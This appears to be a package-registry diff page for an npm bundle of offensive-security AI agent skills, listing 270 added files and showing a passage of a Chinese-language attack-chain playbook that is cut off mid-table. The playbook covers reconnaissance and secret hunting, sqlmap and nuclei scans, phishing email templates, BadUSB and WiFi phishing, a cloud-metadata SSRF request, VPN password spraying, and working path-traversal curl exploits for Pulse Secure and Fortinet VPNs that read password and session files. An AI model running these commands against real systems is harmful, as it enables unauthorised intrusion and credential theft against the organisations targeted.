opencode-skills-collection 4.0.43 → 4.0.44

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (270) hide show
  1. package/bundled-skills/.antigravity-install-manifest.json +47 -1
  2. package/bundled-skills/api-rate-limit-handler/SKILL.md +282 -0
  3. package/bundled-skills/api-security/SKILL.md +205 -0
  4. package/bundled-skills/api-security/references/jwt-oauth-testing.md +123 -0
  5. package/bundled-skills/api-security/references/rest-graphql-testing.md +137 -0
  6. package/bundled-skills/apk-reverse/SKILL.md +438 -0
  7. package/bundled-skills/apk-reverse/references/android-advanced.md +365 -0
  8. package/bundled-skills/apk-reverse/references/apk-security-checklist.md +230 -0
  9. package/bundled-skills/apk-reverse/references/frida-bypass-kit.md +70 -0
  10. package/bundled-skills/apk-reverse/references/frida-cookbook.md +472 -0
  11. package/bundled-skills/attack-chain/SKILL.md +185 -0
  12. package/bundled-skills/attack-chain/references/attack-playbooks.md +126 -0
  13. package/bundled-skills/attack-chain/references/evasion-cheatsheet.md +133 -0
  14. package/bundled-skills/attack-chain/references/lifecycle-checklist.md +37 -0
  15. package/bundled-skills/attack-chain/references/phases.md +490 -0
  16. package/bundled-skills/binary-diff/SKILL.md +320 -0
  17. package/bundled-skills/binary-diff/references/prompt-template.md +173 -0
  18. package/bundled-skills/browser-extension-reverse/SKILL.md +99 -0
  19. package/bundled-skills/browser-extension-reverse/references/extension-analysis.md +10 -0
  20. package/bundled-skills/case-review/SKILL.md +167 -0
  21. package/bundled-skills/cloud-k8s/SKILL.md +124 -0
  22. package/bundled-skills/cloud-k8s/references/k8s-cloud-checklist.md +16 -0
  23. package/bundled-skills/code-audit/SKILL.md +92 -0
  24. package/bundled-skills/code-audit/references/sast-review-checklist.md +10 -0
  25. package/bundled-skills/database-security/SKILL.md +81 -0
  26. package/bundled-skills/database-security/references/db-misconfig-checklist.md +9 -0
  27. package/bundled-skills/diagram-generator/SKILL.md +199 -0
  28. package/bundled-skills/diagram-generator/references/README.md +3 -0
  29. package/bundled-skills/diagram-generator/references/diagram-patterns.md +254 -0
  30. package/bundled-skills/digital-forensics/SKILL.md +93 -0
  31. package/bundled-skills/digital-forensics/references/forensics-triage.md +10 -0
  32. package/bundled-skills/docs/integrations/jetski-cortex.md +3 -3
  33. package/bundled-skills/docs/integrations/jetski-gemini-loader/README.md +1 -1
  34. package/bundled-skills/docs/maintainers/repo-growth-seo.md +1 -1
  35. package/bundled-skills/docs/maintainers/skills-update-guide.md +1 -1
  36. package/bundled-skills/docs/sources/sources.md +9 -0
  37. package/bundled-skills/docs/users/aas-core.md +1 -1
  38. package/bundled-skills/docs/users/bundles.md +1 -1
  39. package/bundled-skills/docs/users/claude-code-skills.md +1 -1
  40. package/bundled-skills/docs/users/gemini-cli-skills.md +1 -1
  41. package/bundled-skills/docs/users/kiro-integration.md +1 -1
  42. package/bundled-skills/docs/users/usage.md +3 -3
  43. package/bundled-skills/docs/users/visual-guide.md +4 -4
  44. package/bundled-skills/docs-generator/SKILL.md +197 -0
  45. package/bundled-skills/docs-generator/references/security-report-templates.md +348 -0
  46. package/bundled-skills/docs-generator/references/templates.md +102 -0
  47. package/bundled-skills/docs-generator/references/vendor-report-rules.md +263 -0
  48. package/bundled-skills/dotnet-reverse/SKILL.md +197 -0
  49. package/bundled-skills/dotnet-reverse/references/common-workflow.md +171 -0
  50. package/bundled-skills/dotnet-reverse/references/obfuscators.md +145 -0
  51. package/bundled-skills/dotnet-reverse/references/sharp-tools.md +164 -0
  52. package/bundled-skills/edr-bypass-re/SKILL.md +248 -0
  53. package/bundled-skills/edr-bypass-re/references/hook-survey.md +226 -0
  54. package/bundled-skills/edr-bypass-re/references/telemetry-blinding.md +346 -0
  55. package/bundled-skills/edr-bypass-re/references/unhook-techniques.md +338 -0
  56. package/bundled-skills/email-security/SKILL.md +81 -0
  57. package/bundled-skills/email-security/references/email-auth-checklist.md +8 -0
  58. package/bundled-skills/firmware-pentest/SKILL.md +381 -0
  59. package/bundled-skills/firmware-pentest/references/emba-automated-analysis.md +192 -0
  60. package/bundled-skills/firmware-pentest/references/emulation-and-fuzz.md +337 -0
  61. package/bundled-skills/firmware-pentest/references/extraction-methodology.md +285 -0
  62. package/bundled-skills/ghidra-reverse/SKILL.md +98 -0
  63. package/bundled-skills/ghidra-reverse/references/ghidra-cheatsheet.md +12 -0
  64. package/bundled-skills/go-rust-reverse/SKILL.md +82 -0
  65. package/bundled-skills/go-rust-reverse/references/go-rust-notes.md +5 -0
  66. package/bundled-skills/hardware-security/SKILL.md +80 -0
  67. package/bundled-skills/hardware-security/references/debug-interface-triage.md +7 -0
  68. package/bundled-skills/ida-reverse/SKILL.md +401 -0
  69. package/bundled-skills/ida-reverse/references/LOCAL-SETUP.md +66 -0
  70. package/bundled-skills/ida-reverse/references/ida-mcp-cheatsheet.md +515 -0
  71. package/bundled-skills/identity-federation/SKILL.md +81 -0
  72. package/bundled-skills/identity-federation/references/sso-flow-checklist.md +9 -0
  73. package/bundled-skills/instructree/SKILL.md +94 -0
  74. package/bundled-skills/js-reverse/SKILL.md +239 -0
  75. package/bundled-skills/js-reverse/references/ast-deobfuscation.md +3 -0
  76. package/bundled-skills/js-reverse/references/automation-entry.md +12 -0
  77. package/bundled-skills/js-reverse/references/env-patching.md +6 -0
  78. package/bundled-skills/js-reverse/references/fallbacks.md +8 -0
  79. package/bundled-skills/js-reverse/references/instrumentation.md +9 -0
  80. package/bundled-skills/js-reverse/references/local-rebuild.md +11 -0
  81. package/bundled-skills/js-reverse/references/mcp-task-template.md +30 -0
  82. package/bundled-skills/js-reverse/references/node-env-rebuild.md +9 -0
  83. package/bundled-skills/js-reverse/references/output-contract.md +9 -0
  84. package/bundled-skills/js-reverse/references/task-artifacts.md +11 -0
  85. package/bundled-skills/js-reverse/references/task-input-template.md +11 -0
  86. package/bundled-skills/js-reverse/references/tool-defaults.md +7 -0
  87. package/bundled-skills/llm-security/SKILL.md +160 -0
  88. package/bundled-skills/llm-security/references/agent-obedience-engineering.md +243 -0
  89. package/bundled-skills/llm-security/references/agent-security-testing.md +116 -0
  90. package/bundled-skills/llm-security/references/owasp-llm-top10.md +48 -0
  91. package/bundled-skills/llm-security/references/prompt-injection-methodology.md +107 -0
  92. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package-lock.json +4 -4
  93. package/bundled-skills/loki-mode/examples/todo-app-generated/backend/package.json +1 -1
  94. package/bundled-skills/macos-reverse/SKILL.md +85 -0
  95. package/bundled-skills/macos-reverse/references/macho-triage.md +10 -0
  96. package/bundled-skills/malware-analysis/SKILL.md +311 -0
  97. package/bundled-skills/malware-analysis/references/anti-analysis-techniques.md +205 -0
  98. package/bundled-skills/malware-analysis/references/sandbox-orchestration.md +204 -0
  99. package/bundled-skills/malware-analysis/references/yara-sigma-rules.md +232 -0
  100. package/bundled-skills/mobile-reverse/SKILL.md +222 -0
  101. package/bundled-skills/mobile-reverse/references/anti-detection-bypass.md +182 -0
  102. package/bundled-skills/mobile-reverse/references/frida-objection-deep.md +218 -0
  103. package/bundled-skills/mobile-reverse/references/ios-reverse-guide.md +177 -0
  104. package/bundled-skills/muapi-media/SKILL.md +311 -0
  105. package/bundled-skills/ot-ics/SKILL.md +117 -0
  106. package/bundled-skills/ot-ics/references/ot-safe-assessment.md +10 -0
  107. package/bundled-skills/patch-diff-exploit/SKILL.md +278 -0
  108. package/bundled-skills/patch-diff-exploit/references/diff-tools-comparison.md +271 -0
  109. package/bundled-skills/patch-diff-exploit/references/patch-tuesday-workflow.md +253 -0
  110. package/bundled-skills/patch-diff-exploit/references/root-cause-and-poc.md +198 -0
  111. package/bundled-skills/pentest-tools/SKILL.md +346 -0
  112. package/bundled-skills/pentest-tools/references/ai-pentest-agents.md +148 -0
  113. package/bundled-skills/pentest-tools/references/ai-pentesting-landscape-2026.md +73 -0
  114. package/bundled-skills/pentest-tools/references/automation-loop-pattern.md +153 -0
  115. package/bundled-skills/pentest-tools/references/awesome-pentest-digest.md +175 -0
  116. package/bundled-skills/pentest-tools/references/burpsuite-mcp-guide.md +769 -0
  117. package/bundled-skills/pentest-tools/references/client-side-lab-playbook.md +155 -0
  118. package/bundled-skills/pentest-tools/references/kali-mcp-ecosystem.md +119 -0
  119. package/bundled-skills/pentest-tools/references/msf-protocol.md +169 -0
  120. package/bundled-skills/pentest-tools/references/network-attack-defense.md +350 -0
  121. package/bundled-skills/pentest-tools/references/nuclei-guide-2026.md +157 -0
  122. package/bundled-skills/pentest-tools/references/payloads.md +32 -0
  123. package/bundled-skills/pentest-tools/references/pentest-ai-agents-matrix.md +117 -0
  124. package/bundled-skills/pentest-tools/references/pentest-loop.md +270 -0
  125. package/bundled-skills/pentest-tools/references/recon-pipeline.md +154 -0
  126. package/bundled-skills/pentest-tools/references/templates/findings.md +21 -0
  127. package/bundled-skills/pentest-tools/references/templates/progress.md +17 -0
  128. package/bundled-skills/pentest-tools/references/templates/rules.md +35 -0
  129. package/bundled-skills/pentest-tools/references/templates/scope.md +29 -0
  130. package/bundled-skills/pentest-tools/references/templates/task_plan.md +27 -0
  131. package/bundled-skills/pentest-tools/references/web-attack-cheatsheet.md +387 -0
  132. package/bundled-skills/pentest-tools/src-hunter/SKILL.md +243 -0
  133. package/bundled-skills/pentest-tools/src-hunter/references/README.en.md +115 -0
  134. package/bundled-skills/pentest-tools/src-hunter/references/README.md +148 -0
  135. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/00-index.md +44 -0
  136. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/chinese-srcfingerprints.md +515 -0
  137. package/bundled-skills/pentest-tools/src-hunter/references/dictionaries/default-credentials-cn.md +274 -0
  138. package/bundled-skills/pentest-tools/src-hunter/references/industry/00-index.md +66 -0
  139. package/bundled-skills/pentest-tools/src-hunter/references/industry/banking-finance.md +338 -0
  140. package/bundled-skills/pentest-tools/src-hunter/references/industry/telecom-isp.md +315 -0
  141. package/bundled-skills/pentest-tools/src-hunter/references/methodology/00-index.md +68 -0
  142. package/bundled-skills/pentest-tools/src-hunter/references/methodology/01-attack-priority.md +143 -0
  143. package/bundled-skills/pentest-tools/src-hunter/references/methodology/02-bypass-toolkit.md +357 -0
  144. package/bundled-skills/pentest-tools/src-hunter/references/methodology/03-evidence-discipline.md +205 -0
  145. package/bundled-skills/pentest-tools/src-hunter/references/methodology/04-control-gap-hunting.md +238 -0
  146. package/bundled-skills/pentest-tools/src-hunter/references/methodology/05-srctimebox-priority.md +161 -0
  147. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/adcs/346/224/273/345/207/273.md +254 -0
  148. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/exchange/346/224/273/345/207/273.md +254 -0
  149. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet/sharepoint/346/224/273/345/207/273.md +113 -0
  150. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//344/277/241/346/201/257/346/224/266/351/233/206.md +947 -0
  151. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/205/215/346/235/200/344/270/216/350/247/204/351/201/277.md +780 -0
  152. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/207/255/350/257/201/347/252/203/345/217/226.md +1259 -0
  153. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//345/237/237/346/270/227/351/200/217/346/224/273/345/207/273.md +753 -0
  154. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/346/217/220/345/215/207.md +819 -0
  155. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/235/203/351/231/220/347/273/264/346/214/201.md +577 -0
  156. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//346/250/252/345/220/221/347/247/273/345/212/250.md +838 -0
  157. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/intranet//351/232/247/351/201/223/344/273/243/347/220/206.md +604 -0
  158. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ai/345/256/211/345/205/250.md +698 -0
  159. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/api/345/256/211/345/205/250.md +1935 -0
  160. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/csrf/350/267/250/347/253/231/350/257/267/346/261/202/344/274/252/351/200/240.md +952 -0
  161. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/jwt/345/256/211/345/205/250.md +496 -0
  162. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/lfi-rfi/346/226/207/344/273/266/345/214/205/345/220/253.md +1365 -0
  163. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/rce/350/277/234/347/250/213/344/273/243/347/240/201/346/211/247/350/241/214.md +1329 -0
  164. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/sql-nosql/346/263/250/345/205/245.md +1924 -0
  165. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssrf/346/234/215/345/212/241/347/253/257/350/257/267/346/261/202/344/274/252/351/200/240.md +1256 -0
  166. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/ssti/346/250/241/346/235/277/346/263/250/345/205/245.md +1151 -0
  167. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/websocket/345/256/211/345/205/250.md +487 -0
  168. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xss/350/267/250/347/253/231/350/204/232/346/234/254.md +1465 -0
  169. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web/xxe/345/256/236/344/275/223/346/263/250/345/205/245.md +815 -0
  170. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/270/232/345/212/241/351/200/273/350/276/221/346/274/217/346/264/236.md +594 -0
  171. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/272/221/345/256/211/345/205/250/346/274/217/346/264/236.md +561 -0
  172. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//344/276/233/345/272/224/351/223/276/346/224/273/345/207/273.md +399 -0
  173. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/216/237/345/236/213/351/223/276/346/261/241/346/237/223.md +401 -0
  174. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//345/274/200/346/224/276/351/207/215/345/256/232/345/220/221.md +396 -0
  175. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/226/207/344/273/266/346/274/217/346/264/236.md +0 -0
  176. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//346/241/206/346/236/266/346/274/217/346/264/236.md +2304 -0
  177. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/202/271/345/207/273/345/212/253/346/214/201.md +339 -0
  178. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//347/274/223/345/255/230/344/270/216cdn/345/256/211/345/205/250.md +497 -0
  179. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/256/244/350/257/201/346/274/217/346/264/236.md +1778 -0
  180. package/bundled-skills/pentest-tools/src-hunter/references/payloader/by-category/web//350/257/267/346/261/202/350/265/260/347/247/201.md +854 -0
  181. package/bundled-skills/pentest-tools/src-hunter/references/payloader/index.md +69 -0
  182. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/web/346/270/227/351/200/217.md +662 -0
  183. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools/windows/346/270/227/351/200/217.md +100 -0
  184. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//344/277/241/346/201/257/346/224/266/351/233/206.md +852 -0
  185. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/206/205/347/275/221/346/270/227/351/200/217.md +873 -0
  186. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/207/255/350/257/201/347/252/203/345/217/226.md +186 -0
  187. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/237/237/346/270/227/351/200/217.md +50 -0
  188. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//345/257/206/347/240/201/346/224/273/345/207/273.md +462 -0
  189. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/235/203/351/231/220/346/217/220/345/215/207.md +168 -0
  190. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//346/274/217/346/264/236/345/210/251/347/224/250.md +445 -0
  191. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/263/273/347/273/237/345/221/275/344/273/244.md +410 -0
  192. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/272/242/351/230/237/345/267/245/345/205/267.md +64 -0
  193. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//347/274/226/347/240/201/350/247/243/347/240/201.md +226 -0
  194. package/bundled-skills/pentest-tools/src-hunter/references/payloader/tools//351/232/247/351/201/223/344/273/243/347/220/206.md +84 -0
  195. package/bundled-skills/pentest-tools/src-hunter/references/payloader/waf-bypass.md +6504 -0
  196. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/00-index.md +57 -0
  197. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/api-rest.md +2050 -0
  198. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/arbitrary-x-authz.md +481 -0
  199. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/dos.md +615 -0
  200. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/file-upload.md +1365 -0
  201. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/graphql.md +253 -0
  202. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/http-smuggling.md +924 -0
  203. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/info-disclosure.md +432 -0
  204. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/intranet-postexp.md +4845 -0
  205. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/llm-prompt-injection.md +1394 -0
  206. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/logic-flaws.md +1796 -0
  207. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/mobile.md +397 -0
  208. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/oauth-saml-jwt.md +2504 -0
  209. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/path-traversal.md +1297 -0
  210. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/race-conditions.md +207 -0
  211. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/rce.md +4829 -0
  212. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/sqli.md +1620 -0
  213. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/ssrf-cache-host.md +2098 -0
  214. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/unauth-access.md +330 -0
  215. package/bundled-skills/pentest-tools/src-hunter/references/playbooks/xss.md +1159 -0
  216. package/bundled-skills/pentest-tools/src-hunter/references/templates/report-submission.md +346 -0
  217. package/bundled-skills/pentest-tools/src-hunter/references/tools/mcp-jshook.md +174 -0
  218. package/bundled-skills/protocol-reverse/SKILL.md +108 -0
  219. package/bundled-skills/protocol-reverse/references/protocol-workflow.md +29 -0
  220. package/bundled-skills/pwn-chain/SKILL.md +209 -0
  221. package/bundled-skills/pwn-chain/references/heap-pwn.md +283 -0
  222. package/bundled-skills/pwn-chain/references/kernel-pwn.md +370 -0
  223. package/bundled-skills/pwn-chain/references/stack-pwn.md +312 -0
  224. package/bundled-skills/radare2/SKILL.md +460 -0
  225. package/bundled-skills/radare2/references/cheatsheet.md +129 -0
  226. package/bundled-skills/radio-sdr/SKILL.md +77 -0
  227. package/bundled-skills/radio-sdr/references/sdr-lab-rules.md +6 -0
  228. package/bundled-skills/reverse-browser-automation/SKILL.md +249 -0
  229. package/bundled-skills/reverse-browser-automation/references/playwright-cheatsheet.md +425 -0
  230. package/bundled-skills/reverse-engineering/SKILL.md +213 -0
  231. package/bundled-skills/reverse-engineering/dsl-vm-reverse/SKILL.md +388 -0
  232. package/bundled-skills/reverse-engineering/references/ai-assisted-re.md +149 -0
  233. package/bundled-skills/reverse-engineering/references/anti-analysis.md +836 -0
  234. package/bundled-skills/reverse-engineering/references/awesome-re-resources.md +135 -0
  235. package/bundled-skills/reverse-engineering/references/crypto-decode-tools.md +220 -0
  236. package/bundled-skills/reverse-engineering/references/elf-analysis.md +296 -0
  237. package/bundled-skills/reverse-engineering/references/field-notes.md +540 -0
  238. package/bundled-skills/reverse-engineering/references/go-reverse.md +240 -0
  239. package/bundled-skills/reverse-engineering/references/kernel-driver-reverse.md +298 -0
  240. package/bundled-skills/reverse-engineering/references/languages-compiled.md +587 -0
  241. package/bundled-skills/reverse-engineering/references/languages-platforms.md +486 -0
  242. package/bundled-skills/reverse-engineering/references/languages.md +499 -0
  243. package/bundled-skills/reverse-engineering/references/nonpe-format-cookbook.md +301 -0
  244. package/bundled-skills/reverse-engineering/references/ollvm-deobfuscation.md +501 -0
  245. package/bundled-skills/reverse-engineering/references/patterns-ctf-2.md +397 -0
  246. package/bundled-skills/reverse-engineering/references/patterns-ctf-3.md +719 -0
  247. package/bundled-skills/reverse-engineering/references/patterns-ctf.md +532 -0
  248. package/bundled-skills/reverse-engineering/references/patterns.md +801 -0
  249. package/bundled-skills/reverse-engineering/references/platforms-hardware.md +304 -0
  250. package/bundled-skills/reverse-engineering/references/platforms.md +442 -0
  251. package/bundled-skills/reverse-engineering/references/re-agent-workflow.md +240 -0
  252. package/bundled-skills/reverse-engineering/references/tools-advanced.md +822 -0
  253. package/bundled-skills/reverse-engineering/references/tools-dynamic.md +846 -0
  254. package/bundled-skills/reverse-engineering/references/tools.md +546 -0
  255. package/bundled-skills/supply-chain-security/SKILL.md +180 -0
  256. package/bundled-skills/supply-chain-security/references/cicd-pipeline-security.md +137 -0
  257. package/bundled-skills/supply-chain-security/references/sbom-sca-methodology.md +74 -0
  258. package/bundled-skills/thick-client/SKILL.md +104 -0
  259. package/bundled-skills/thick-client/references/thick-client-checklist.md +9 -0
  260. package/bundled-skills/threat-hunting/SKILL.md +94 -0
  261. package/bundled-skills/threat-hunting/references/hunting-loop.md +5 -0
  262. package/bundled-skills/threat-intelligence/SKILL.md +176 -0
  263. package/bundled-skills/threat-intelligence/references/x-public-intelligence.md +93 -0
  264. package/bundled-skills/tree-ring-memory/SKILL.md +29 -9
  265. package/bundled-skills/wifi-wireless/SKILL.md +80 -0
  266. package/bundled-skills/wifi-wireless/references/wireless-lab-rules.md +6 -0
  267. package/bundled-skills/windows-ad/SKILL.md +109 -0
  268. package/bundled-skills/windows-ad/references/ad-attack-paths.md +12 -0
  269. package/package.json +1 -1
  270. package/skills_index.json +1214 -2
@@ -0,0 +1,490 @@
1
+ # Attack Chain Phases Reference
2
+
3
+ ## 一、信息收集阶段(Reconnaissance)
4
+
5
+ ### 1.1 企业数字资产测绘
6
+
7
+ ```bash
8
+ # 子公司关联域名发现
9
+ subfinder -d target.com -o subdomains.txt
10
+ amass enum -d target.com -passive -o amass_results.txt
11
+
12
+ # 合并去重
13
+ cat subdomains.txt amass_results.txt | sort -u > all_subs.txt
14
+
15
+ # 存活探测
16
+ httpx -l all_subs.txt -status-code -title -tech-detect -o alive.txt
17
+
18
+ # 端口扫描(全端口)
19
+ naabu -l all_subs.txt -top-ports 1000 -o ports.txt
20
+ nmap -sV -sC -iL targets.txt -oA nmap_results
21
+ ```
22
+
23
+ **实战要点**:
24
+ - 通过企查查/天眼查获取子公司列表,扩大攻击面
25
+ - 关注测试环境(test.、dev.、staging.)和新上线系统
26
+ - 证书透明度日志(crt.sh)发现隐藏域名
27
+
28
+ ### 1.2 敏感信息泄露狩猎
29
+
30
+ ```bash
31
+ # GitHub 搜索
32
+ # org:Company filename:.env password
33
+ # org:Company filename:config.yml secret
34
+ # org:Company "jdbc:mysql" password
35
+
36
+ # Google Dork
37
+ # site:target.com filetype:sql
38
+ # site:target.com inurl:admin
39
+ # site:target.com ext:conf|cfg|ini
40
+
41
+ # JS 文件中的 API Key
42
+ cat js_urls.txt | while read url; do
43
+ curl -s "$url" | grep -oP '(api[_-]?key|secret|token|password)\s*[:=]\s*["\047][^"\047]+'
44
+ done
45
+ ```
46
+
47
+ **高价值目标**:
48
+ - 云服务 AK/SK(阿里云、AWS、Azure)
49
+ - 数据库连接字符串
50
+ - JWT 密钥
51
+ - 内部 API 文档
52
+ - VPN/堡垒机凭据
53
+
54
+ ### 1.3 员工信息画像
55
+
56
+ **社工字典生成规则**:
57
+ ```
58
+ {姓名拼音}{年份} → zhangsan2024
59
+ {姓名首字母}{部门缩写} → zs_dev
60
+ {工号}@{域名} → 10086@target.com
61
+ {姓名}{常见后缀} → zhangsan@123, zhangsan!@#
62
+ ```
63
+
64
+ **信息来源**:
65
+ - 脉脉/LinkedIn 部门架构
66
+ - 企业公众号/官网团队介绍
67
+ - 招聘信息(技术栈暴露)
68
+ - 学术论文(邮箱暴露)
69
+
70
+ ### 1.4 技术栈指纹识别
71
+
72
+ ```bash
73
+ # Web 指纹
74
+ whatweb -i alive.txt --log-json=fingerprint.json
75
+ httpx -l alive.txt -tech-detect -json -o tech.json
76
+
77
+ # 特定框架探测
78
+ nuclei -l alive.txt -tags tech -severity info -o tech_results.txt
79
+
80
+ # CMS 识别
81
+ wpscan --url https://target.com --enumerate p,t,u
82
+ ```
83
+
84
+ ---
85
+
86
+ ## 二、边界突破阶段(Initial Access)
87
+
88
+ ### 2.1 Web 漏洞利用(高频突破点)
89
+
90
+ | 漏洞类型 | 检测工具 | 利用方式 |
91
+ |---------|---------|---------|
92
+ | SQL 注入 | sqlmap | 数据提取 → 写 shell → OS 命令 |
93
+ | SSTI | sstimap | 模板注入 → RCE |
94
+ | 文件上传 | 手工 + Burp | Webshell → 反弹 shell |
95
+ | 反序列化 | ysoserial/marshalsec | Java/PHP/Python RCE |
96
+ | SSRF | 手工 | 内网探测 → 云元数据 → AK/SK |
97
+ | 未授权访问 | nuclei | Spring Actuator / Nacos / Redis |
98
+ | XSS → Cookie | xsstrike | 管理员会话劫持 |
99
+
100
+ ```bash
101
+ # SQL 注入自动化
102
+ sqlmap -u "https://target.com/api?id=1" --batch --dbs --random-agent
103
+
104
+ # SSTI 检测
105
+ sstimap -u "https://target.com/search?q=test"
106
+
107
+ # Nuclei 批量扫描
108
+ nuclei -l alive.txt -severity critical,high -tags cve,sqli,rce -o vulns.txt
109
+ ```
110
+
111
+ ### 2.2 供应链攻击
112
+
113
+ **攻击路径**:
114
+ 1. 识别目标使用的第三方组件/服务商
115
+ 2. 攻击供应商获取代码签名/更新推送权限
116
+ 3. 通过合法更新通道投递恶意载荷
117
+
118
+ **常见入口**:
119
+ - 开源组件投毒(npm/pip/maven)
120
+ - SaaS 服务商 API 滥用
121
+ - 外包人员权限利用
122
+ - 共享 IT 服务商横向渗透
123
+
124
+ ### 2.3 钓鱼攻击
125
+
126
+ **邮件钓鱼**:
127
+ ```
128
+ 主题模板:
129
+ - [紧急] VPN 证书即将过期,请立即更新
130
+ - [IT通知] 邮箱存储空间不足,请清理
131
+ - [HR] 2024年度绩效考核结果查询
132
+ - [财务] 报销系统升级,请重新登录确认
133
+ ```
134
+
135
+ **载荷类型**:
136
+ - Office 宏文档(.docm/.xlsm)
137
+ - LNK 快捷方式(伪装 PDF)
138
+ - HTML 走私(HTML Smuggling)
139
+ - ISO/IMG 镜像(绕过 MOTW)
140
+ - OneNote 嵌入脚本
141
+
142
+ **OAuth 钓鱼**(2025 新趋势):
143
+ - 构造恶意 OAuth 应用请求权限
144
+ - 用户授权后获取邮箱/文件访问权限
145
+ - 无需密码,绕过 MFA
146
+
147
+ ### 2.4 近源渗透(Physical Access)
148
+
149
+ | 手法 | 工具 | 效果 |
150
+ |------|------|------|
151
+ | BadUSB | Rubber Ducky / WiFi Ducky | 键盘注入 → 反弹 shell |
152
+ | 恶意充电宝 | O.MG Cable | 伪装数据线植入后门 |
153
+ | WiFi 钓鱼 | Fluxion / WiFi Pineapple | 伪造热点 → 凭据捕获 |
154
+ | RFID 克隆 | Proxmark3 | 门禁卡复制 → 物理进入 |
155
+ | 网络植入 | Raspberry Pi / LAN Turtle | 内网持久接入点 |
156
+
157
+ ```bash
158
+ # Fluxion WiFi 钓鱼
159
+ fluxion # 交互式选择目标 AP → 创建伪造热点 → 捕获 WPA 密码
160
+
161
+ # BadUSB 联动 Cobalt Strike
162
+ # 通过 USB 注入 PowerShell 下载器 → 上线 C2
163
+ ```
164
+
165
+ ### 2.5 VPN/远程接入突破
166
+
167
+ ```bash
168
+ # Pulse Secure VPN(CVE-2019-11510)
169
+ curl -k "https://vpn.target.com/dana-na/../dana/html5acc/guacamole/../../../etc/passwd?/dana/html5acc/guacamole/"
170
+
171
+ # Fortinet VPN(CVE-2018-13379)
172
+ curl -k "https://vpn.target.com/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
173
+
174
+ # 通用:密码喷洒
175
+ hydra -L users.txt -P passwords.txt vpn.target.com https-form-post
176
+ ```
177
+
178
+ ### 2.6 云服务突破
179
+
180
+ ```bash
181
+ # AWS S3 桶枚举
182
+ aws s3 ls s3://target-bucket --no-sign-request
183
+
184
+ # 云元数据 SSRF
185
+ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
186
+
187
+ # Azure AD 密码喷洒
188
+ # 使用 MSOLSpray / Spray 工具
189
+ ```
190
+
191
+ ---
192
+
193
+ ## 三、权限提升阶段(Privilege Escalation)
194
+
195
+ ### 3.1 Windows 提权
196
+
197
+ | 技术 | 条件 | 工具 |
198
+ |------|------|------|
199
